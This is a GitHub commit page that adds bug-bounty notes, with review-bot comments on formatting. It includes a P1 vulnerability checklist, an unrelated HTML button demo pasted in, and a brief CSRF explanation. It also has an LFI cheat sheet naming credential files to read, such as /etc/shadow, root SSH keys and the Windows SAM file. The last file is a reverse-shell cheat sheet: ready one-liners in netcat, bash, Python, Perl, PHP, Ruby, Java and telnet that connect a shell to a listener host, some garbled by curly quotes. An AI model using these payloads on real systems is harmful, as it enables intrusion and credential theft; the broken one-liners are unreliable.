Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Tikam02
committed
Sep 2, 2019
1 parent
0daeca1
commit a390a08
Showing
94 changed files
with
948 additions
and
0 deletions.
File renamed without changes.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,63 @@ | ||
* [X] [P1] Server Security Misconfiguration Using Default Credentials | ||
|
||
:ballot_box_with_check: P1 Server-Side Injection File Inclusion Local | ||
|
||
:ballot_box_with_check: P1 Server-Side Injection Remote Code Execution (RCE) | ||
|
||
:ballot_box_with_check: P1 Server-Side Injection SQL Injection | ||
|
||
:ballot_box_with_check: P1 Server-Side Injection XML External Entity Injection (XXE) | ||
|
||
:ballot_box_with_check: P1 Broken Authentication and Session Management Authentication Bypass | ||
|
||
:ballot_box_with_check: P1 Sensitive Data Exposure Critically Sensitive Data Password Disclosure | ||
|
||
:ballot_box_with_check: P1 Sensitive Data Exposure Critically Sensitive Data Private API Keys | ||
|
||
:ballot_box_with_check: P1 Insecure OS/Firmware Command Injection | ||
|
||
:ballot_box_with_check: P1 Insecure OS/Firmware Hardcoded Password Privileged User | ||
|
||
:ballot_box_with_check: P1 Broken Cryptography Cryptographic Flaw Incorrect Usage | ||
|
||
:ballot_box_with_check: P1 Automotive Security Misconfiguration Infotainment PII Leakage | ||
|
||
:ballot_box_with_check: P1 Automotive Security Misconfiguration RF Hub Key Fob Cloning | ||
|
||
|
||
<!DOCTYPE html> | ||
<html> | ||
<head> | ||
<style> | ||
.button { | ||
background-color: #4CAF50; /* Green */ | ||
border: none; | ||
color: white; | ||
padding: 15px 32px; | ||
text-align: center; | ||
text-decoration: none; | ||
display: inline-block; | ||
font-size: 16px; | ||
margin: 4px 2px; | ||
cursor: pointer; | ||
} | ||
|
||
.button2 {background-color: #008CBA;} /* Blue */ | ||
.button3 {background-color: #f44336;} /* Red */ | ||
.button4 {background-color: #e7e7e7; color: black;} /* Gray */ | ||
.button5 {background-color: #555555;} /* Black */ | ||
</style> | ||
</head> | ||
<body> | ||
|
||
<h2>Button Colors</h2> | ||
<p>Change the background color of a button with the background-color property:</p> | ||
|
||
<button class="button">Green</button><br> | ||
<button class="button button2">Blue</button> | ||
<button class="button button3">Red</button> | ||
<button class="button button4">Gray</button> | ||
<button class="button button5">Black</button> | ||
|
||
</body> | ||
</html> |
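Review bot: everything from `<!DOCTYPE html>` to `</html>` is a complete "Button Colors" HTML/CSS demo page that has no connection to the P1 checklist above it; it looks like a stray paste and should be removed or moved to its own file. In the checklist itself, the first entry uses `* [X] [P1] ...` while the other twelve use `:ballot_box_with_check: P1 ...`; pick one marker so the list renders consistently, and put a separator between category, subcategory and variant, since names such as "Sensitive Data Exposure Critically Sensitive Data Password Disclosure" are hard to parse when run together.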
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
### CSRF | ||
***** | ||
|
||
CSRF (Cross site request forgery) is the vulnerability that tricks the user to submit the malicious request if there is no implementation of the Anti-CSRF tokens in the forms or site. When implemented your website https://vulnerables.com will include a random generated number or token to every page which is impossible to guess by the attacker so https://vulnerables.com will include it when they serve it to you. It differs each time they serve any page to anybody so attacker won’t be able to generate a valid request because of the wrong token. | ||
|
||
### What is CSRF attack? | ||
CSRF is an attack that tricks the victim to send a malicious request this request can change the victim information like Email, Username, Passwords and etc… |
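Review bot: the opening paragraph switches from describing the attack to describing the defence mid-paragraph ("When implemented your website https://vulnerables.com will include ..."), and the "What is CSRF attack?" section then repeats the definition a second time. Suggest moving the attack definition first and giving the anti-CSRF token its own section that states outright that the server checks the token on every state-changing request, which the text only implies with "wrong token". The `*****` line under the `### CSRF` heading renders as a horizontal rule; drop it if that is not intended.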
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,48 @@ | ||
# LFI Cheat Sheet | ||
|
||
[LINK](https://xapax.gitbooks.io/security/content/local_file_inclusion.html) | ||
### Useful LFI files | ||
../../../../../etc/passwd%00 | ||
|
||
### Linux: | ||
/etc/passwd | ||
/etc/shadow | ||
/etc/issue | ||
/etc/group | ||
/etc/hostname | ||
/etc/ssh/ssh_config | ||
/etc/ssh/sshd_config | ||
/root/.ssh/id_rsa | ||
/root/.ssh/authorized_keys | ||
/home/user/.ssh/authorized_keys | ||
/home/user/.ssh/id_rsa | ||
|
||
### Apache: | ||
#### Configuration Files: | ||
/etc/apache2/apache2.conf | ||
/usr/local/etc/apache2/httpd.conf | ||
/etc/httpd/conf/httpd.conf | ||
|
||
### Log Files: | ||
### Red Hat/CentOS/Fedora Linux- /var/log/httpd/access_log | ||
### Debian/Ubuntu- /var/log/apache2/access.log | ||
### FreeBSD- /var/log/httpd-access.log | ||
|
||
### Generic: | ||
/var/log/apache/access.log | ||
/var/log/apache/error.log | ||
/var/log/apache2/access.log | ||
/var/log/apache/error.log | ||
|
||
### MySql: | ||
/var/lib/mysql/mysql/user.frm | ||
/var/lib/mysql/mysql/user.MYD | ||
/var/lib/mysql/mysql/user.MYI | ||
|
||
### Windows: | ||
/boot.ini | ||
/autoexec.bat | ||
/windows/system32/drivers/etc/hosts | ||
/windows/repair/SAM | ||
/windows/panther/unattended.xml | ||
/windows/panther/unattend/unattended.xml |
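Review bot: under "### Generic:" the path `/var/log/apache/error.log` is listed twice; the second occurrence follows `/var/log/apache2/access.log`, so it was presumably meant to be the `apache2` error log. In the "### Log Files:" block the three distribution entries are written as `###` headings ("### Red Hat/CentOS/Fedora Linux- /var/log/httpd/access_log") instead of list items, and that block sits at the same level as "### Apache:" although "#### Configuration Files:" is nested one level deeper; make both subsections of Apache. None of the paths are fenced or bulleted, so consecutive lines will collapse into one paragraph when rendered; a short line per group saying what the files contain would also help a reader decide which ones need tight permissions.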
Binary file not shown.
Binary file not shown.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,54 @@ | ||
# Reverse Shell Cheat Sheet | ||
*********** | ||
### Netcat: | ||
nc 192.168.1.10 443 -e /bin/bash | ||
|
||
/bin/sh | nc 192.168.1.10 443 | ||
|
||
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.10 443 0/tmp/p | ||
|
||
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f | ||
|
||
### Bash: | ||
bash -i >& /dev/tcp/192.168.1.10/443 0>&1 | ||
|
||
/bin/bash -i > /dev/tcp/192.168.1.10/443 0<&1 2>&1 | ||
|
||
0<&196;exec 196<>/dev/tcp/192.168.1.10/443; sh <&196 >&196 2>&196 | ||
|
||
exec 5<>/dev/tcp/192.168.1.10/443 | ||
cat <&5 | while read line; do $line 2>&5 >&5; done | ||
|
||
exec 5<>/dev/tcp/192.168.1.10/443 | ||
cat <&5 | while read line 0<&5; do $line 2>&5 >&5; done | ||
|
||
### Python: | ||
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.10”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ | ||
|
||
### Perl: | ||
*nix: | ||
perl -e ‘use Socket;$i=”192.168.1.10″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ | ||
|
||
### Windows: | ||
perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”192.168.1.10-IP:443″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’ | ||
|
||
perl -e ‘use Socket;$i=”192.168.1.10″;$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ | ||
|
||
### PHP: | ||
php -r ‘$sock=fsockopen(“192.168.1.10”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’ | ||
|
||
### Ruby: | ||
ruby -rsocket -e’f=TCPSocket.open(“192.168.1.10”,443).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’ | ||
|
||
### Windows | ||
ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’ | ||
|
||
### Java: | ||
r = Runtime.getRuntime() | ||
p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.1.10/443;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[]) | ||
p.waitFor() | ||
|
||
### Telnet: | ||
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.10 443 0/tmp/p | ||
|
||
telnet 192.168.1.10 443 | /bin/bash | telnet 192.168.1.10 443 |
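Review bot: the heading structure under "### Perl:" and "### Ruby:" is inconsistent: "*nix:" is plain text while "### Windows:" and "### Windows" are level-3 headings, so the Windows variants render as sections of their own rather than as sub-cases of Perl and Ruby. The second entry under the Perl "### Windows:" heading is a verbatim copy of the "*nix:" one-liner and still runs `/bin/sh -i`, so it does not belong there. The listener address is written three ways (`192.168.1.10`, `attackerip`, `192.168.1.10-IP:443`); use one documented placeholder throughout. None of the commands are in code blocks, so Markdown is free to reinterpret their characters and adjacent lines run together; fence each entry and replace the `***********` line under the title if a horizontal rule is not intended.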